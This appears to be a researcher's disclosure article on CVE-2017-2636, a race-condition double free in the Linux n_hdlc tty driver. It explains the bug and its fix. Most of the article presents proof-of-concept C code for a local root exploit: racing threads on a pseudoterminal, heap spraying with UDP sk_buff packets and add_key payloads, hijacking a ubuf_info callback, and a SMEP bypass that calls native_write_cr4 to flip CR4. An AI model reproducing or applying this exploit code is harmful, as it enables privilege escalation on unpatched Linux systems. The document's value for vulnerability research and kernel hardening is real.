This article discloses the exploitation of CVE-2017-2636, which is a race condition in the n_hdlc
Linux kernel driver (drivers/tty/n_hdlc.c
). The described exploit gains root privileges bypassing Supervisor Mode Execution Protection (SMEP).
This driver provides HDLC
serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m
in the kernel config. So RHEL 6/7, Fedora, SUSE, Debian, and Ubuntu were affected by CVE-2017-2636.
Currently the flaw is fixed in the mainline Linux kernel (public disclosure). The bug was introduced quite a long time ago, so the patch is backported to the stable kernel versions too.
I’ve managed to make the proof-of-concept exploit quite stable and fast. It crashes the kernel very rarely and gains the root shell in less than 20 seconds (at least on my machines). This PoC defeats SMEP, but doesn’t cope with Supervisor Mode Access Prevention (SMAP), although it is possible with some additional efforts.
My PoC also doesn’t defeat Kernel Address Space Layout Randomization (KASLR) and needs to know the kernel code offset. This offset can be obtained using a kernel pointer leak or the prefetch side-channel attack (see xairy’s implementation).
First of all let’s watch the demo video!
Initially, N_HDLC
line discipline used a self-made singly linked list for data buffers and had n_hdlc.tbuf
pointer for buffer retransmitting after an error. It worked, but the commit be10eb75893
added data flushing and introduced racy access to n_hdlc.tbuf
.
After tx error concurrent flush_tx_queue()
and n_hdlc_send_frames()
both use n_hdlc.tbuf
and can put one buffer to tx_free_buf_list
twice. That causes an exploitable double-free error in n_hdlc_release()
. The data buffers are represented by struct n_hdlc_buf
and allocated in the kmalloc-8192
slab cache.
For fixing this bug, I used a standard kernel linked list and got rid of racy n_hdlc.tbuf
: in case of tx error the current n_hdlc_buf
item is put after the head of tx_buf_list
.
I started the investigation when got a suspicious kernel crash from syzkaller. It is a really great project, which helped to fix an impressively big list of bugs in Linux kernel.
This article is the only way for me to publish the exploit code. So, please, be patient and prepare to plenty of listings!
Let’s look to the code of the main loop: going to race till success.
for (;;) {
long tmo1 = 0;
long tmo2 = 0;
if (loop % 2 == 0)
tmo1 = loop % MAX_RACE_LAG_USEC;
else
tmo2 = loop % MAX_RACE_LAG_USEC;
The loop
counter is incremented every iteration, so tmo1
and tmo2
variables are changing too. They are used for making lags in the racing threads, which:
pthread_barrier
,n_hdlc
.Such a way of colliding threads helps to hit the race condition earlier.
ptmd = open("/dev/ptmx", O_RDWR);
if (ptmd < 0) {
perror("[-] open /dev/ptmx");
goto end;
}
ret = ioctl(ptmd, TIOCSETD, &ldisc);
if (ret < 0) {
perror("[-] TIOCSETD");
goto end;
}
Here we open a pseudoterminal master and slave pair and set the N_HDLC
line discipline for it. For more information about that, see man ptmx
, Documentation/serial/tty.txt
and this great discussion about pty
components.
Setting N_HDLC
ldisc for a serial line causes the n_hdlc
kernel module autoloading. You can get the same effect using ldattach
daemon.
ret = ioctl(ptmd, TCXONC, TCOOFF);
if (ret < 0) {
perror("[-] TCXONC TCOOFF");
goto end;
}
bytes = write(ptmd, buf, TTY_BUF_SZ);
if (bytes != TTY_BUF_SZ) {
printf("[-] write to ptmx (bytes)\n");
goto end;
}
Here we suspend the pseudoterminal output (see man tty_ioctl
) and write one data buffer. The n_hdlc_send_frames()
fails to send this buffer and saves its address in n_hdlc.tbuf
.
We are ready for the race. Start two threads, which are allowed to run on all available CPU cores:
ioctl(ptmd, TCFLSH, TCIOFLUSH)
;ioctl(ptmd, TCXONC, TCOON)
.In a lucky case, they both put the only written buffer pointed by n_hdlc.tbuf
to tx_free_buf_list
.
Now we return to the CPU 0 and trigger possible double-free error:
ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu);
if (ret != 0) {
perror("[-] sched_setaffinity");
goto end;
}
ret = close(ptmd);
if (ret != 0) {
perror("[-] close /dev/ptmx");
goto end;
}
We close the pseudoterminal master. The n_hdlc_release()
goes through n_hdlc_buf_list
items and frees the kernel memory used for data buffers. Here the possible double-free error happens.
This particular bug is successfully detected by the Kernel Address Sanitizer (KASAN), which reports the use-after-free happening just before the second kfree()
.
The final part of the main loop:
ret = exploit_skb(socks, sockaddrs, payload, loop % SOCK_PAIRS);
if (ret != EXIT_SUCCESS)
goto end;
if (getuid() == 0 && geteuid() == 0) {
printf("[+] race #%ld: WIN! flush(%ld), TCOON(%ld)\n",
loop, tmo1, tmo2);
break; /* :) */
}
loop++;
}
printf("[+] finish as: uid=0, euid=0, start sh...\n");
run_sh();
Here we try to exploit the double-free error by overwriting struct sk_buff
. In case of success, we exit from the main loop and run the root shell in the child process using execve()
.
As I mentioned, the doubly freed n_hdlc_buf
item is allocated in the kmalloc-8192
slab cache. For exploiting double-free error for this cache, we need some kernel objects with the size a bit less than 8 kB. Actually, we need two types of such objects:
Searching for such kernel objects and experimenting with them was not easy and took me some time. Finally, I’ve chosen sk_buff
with its destructor_arg
in struct skb_shared_info
. This approach is not new – consider reading the cool write-up about CVE-2016-2384.
The network-related buffers in Linux kernel are represented by struct sk_buff
. See these great pictures describing sk_buff
data layout. The most important for us is that the network data and skb_shared_info
are placed in the same kernel memory block pointed by sk_buff.head
. So creating a 7500-byte network packet in the userspace will make skb_shared_info
be allocated in the kmalloc-8192
slab cache. Exactly like we want.
But there is one challenge: n_hdlc_release()
frees 13 n_hdlc_buf
items straight away. At first I was trying to do the heap spray in parallel with n_hdlc_release()
, but didn’t manage to inject the corresponding kmalloc()
between the needed kfree()
calls. So I used another way: spraying after n_hdlc_release()
can give two sk_buff
items with the head
pointing to the same memory. That’s promising.
So we need to spray hard but keep 8 kB UDP packets allocated to avoid mess in the allocator freelist. Socket queues are limited in size, so I’ve created a lot of sockets using socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
:
sk_buff.head
,Ok. Now we need another kernel object for overwriting the function pointer in skb_shared_info.destructor_arg
. We can’t use sk_buff.head
for that again, because skb_shared_info
is placed at the same offset in sk_buff.head
and we don’t control it. I was really happy to find that add_key
syscall is able to allocate the controllable data in the kmalloc-8192
too.
But I became upset when encountered key data quotas in /proc/sys/kernel/keys/
owned by root. The default value of /proc/sys/kernel/keys/maxbytes
is 20000. It means that only 2 add_key
syscalls can concurrently store our 8 kB payload in the kernel memory, and that’s not enough.
But the happiness returned when I encountered the bright idea at the slides of Di Shen from Keen Security Lab: I can make the heap spray successful even if add_key
fails!
So, let’s look at the init_payload()
code:
#define MMAP_ADDR 0x10000lu
#define PAYLOAD_SZ 8100
#define SKB_END_OFFSET 7872
#define KEY_DATA_OFFSET 18
int init_payload(char *p)
{
struct skb_shared_info *info = (struct skb_shared_info *)(p +
SKB_END_OFFSET - KEY_DATA_OFFSET);
struct ubuf_info *uinfo_p = NULL;
The definition of struct skb_shared_info
and struct ubuf_info
is copied to the exploit code from include/linux/skbuff.h
kernel header.
The payload buffer will be passed to add_key
as a parameter, and the data which we put there at 7872 - 18 = 7854
byte offset will exactly overwrite skb_shared_info
.
char *area = NULL;
void *target_addr = (void *)(MMAP_ADDR);
area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (area != target_addr) {
perror("[-] mmap\n");
return EXIT_FAILURE;
}
uinfo_p = target_addr;
uinfo_p->callback = (uint64_t)root_it;
info->destructor_arg = (uint64_t)uinfo_p;
info->tx_flags = SKBTX_DEV_ZEROCOPY;
The ubuf_info.callback
is called in skb_release_data()
if skb_shared_info.tx_flags
has SKBTX_DEV_ZEROCOPY
flag set to 1. In our case, ubuf_info
item resides in the userspace memory, so dereferencing its pointer in the kernelspace will be detected by SMAP.
Anyway, now the callback
points to root_it()
, which does the classical commit_creds(prepare_kernel_cred(0))
. However, this shellcode resides in the userspace too, so executing it in the kernelspace will be detected by SMEP. We are going to bypass it soon.
As I mentioned, n_hdlc_release()
frees thirteen n_hdlc_buf
items. Our exploit_skb()
is executed shortly after that. Here we do the actual heap spraying by sending twenty 7500-byte UDP packets. Experiments showed that the packets number 12, 13, 14, and 15 are likely to be exploitable, so they are sent to the dedicated server socket.
Now we are going to perform the use-after-free on sk_buff.data
:
add_key
syscalls with our payload after receiving each of them.The exact number of add_key
syscalls giving the best results was found empirically by testing the exploit many times. The example of add_key
call:
k[0] = syscall(__NR_add_key, "user", "payload0",
payload, PAYLOAD_SZ, KEY_SPEC_PROCESS_KEYRING);
If we won the race and did the heap spraying luckily, then our shellcode is executed when the poisoned packet is received. After that we can invalidate the keys that were successfully allocated in the kernel memory:
for (i = 0; i < KEYS_N; i++) {
if (k[i] > 0)
syscall(__NR_keyctl, KEYCTL_INVALIDATE, k[i]);
}
Now we need to prepare the heap to the next round of n_hdlc
racing. The /proc/slabinfo
shows that kmalloc-8192
slab stores only 4 objects, so double-free error has high chances to crash the allocator. But the following trick helps to avoid that and makes the exploit much more stable – send a dozen UDP packets to fill the partially emptied slabs.
As I mentioned, the root_it()
shellcode resides in the userspace. Executing it in the kernelspace is detected by SMEP (Supervisor Mode Execution Protection). It is an x86 feature, which is enabled by toggling the bit 20 of CR4 register.
There are several approaches to defeat it, for example, Vitaly Nikolenko describes how to switch off SMEP using stack pivoting ROP technique. It works great, but I didn’t want to copy it blindly. So I’ve created another quite funny way to defeat SMEP without ROP. Please inform me if that approach is already known.
In arch/x86/include/asm/special_insns.h
I’ve found this function:
static inline void native_write_cr4(unsigned long val)
{
printk("wcr4: 0x%lx\n", val);
asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}
It writes its first argument to CR4.
Now let’s look at skb_release_data()
, which executes the hijacked callback
in the Ring 0:
if (shinfo->tx_flags & SKBTX_DEV_ZEROCOPY) {
struct ubuf_info *uarg;
uarg = shinfo->destructor_arg;
if (uarg->callback)
uarg->callback(uarg, true);
}
We see that the destructor callback
takes uarg
address as the first argument. And we control this address in the exploited sk_buff
.
So I’ve decided to write the address of native_write_cr4()
to ubuf_info.callback
and put ubuf_info
item at the mmap’ed userspace address 0x406e0
, which is the correct value of CR4 with disabled SMEP.
In that case SMEP is disabled on one CPU core without any ROP. However, now we need to win the race twice: first time to disable SMEP, second time to execute the shellcode. But it’s not a problem for this particular exploit since it is fast and reliable.
So let’s initialize the payload a bit differently:
#define CR4_VAL 0x406e0lu
void *target_addr = (void *)(CR4_VAL & 0xfffff000lu);
area = mmap(target_addr, 0x1000, PROT_READ | PROT_WRITE,
MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (area != target_addr) {
perror("[-] mmap\n");
return EXIT_FAILURE;
}
uinfo_p = (struct ubuf_info *)CR4_VAL;
uinfo_p->callback = NATIVE_WRITE_CR4;
info->destructor_arg = (uint64_t)uinfo_p;
info->tx_flags = SKBTX_DEV_ZEROCOPY;
That SMEP bypass looks witty, but introduces one additional requirement - it needs bit 18 (OSXSAVE) of CR4 set to 1. Otherwise target_addr
becomes 0 and mmap()
fails, since mapping the zero page is not allowed.
Investigating of CVE-2017-2636
and writing this article was a big fun for me. I want to thank Positive Technologies for giving me the opportunity to work on this research. I would really appreciate feedback. See my contacts below.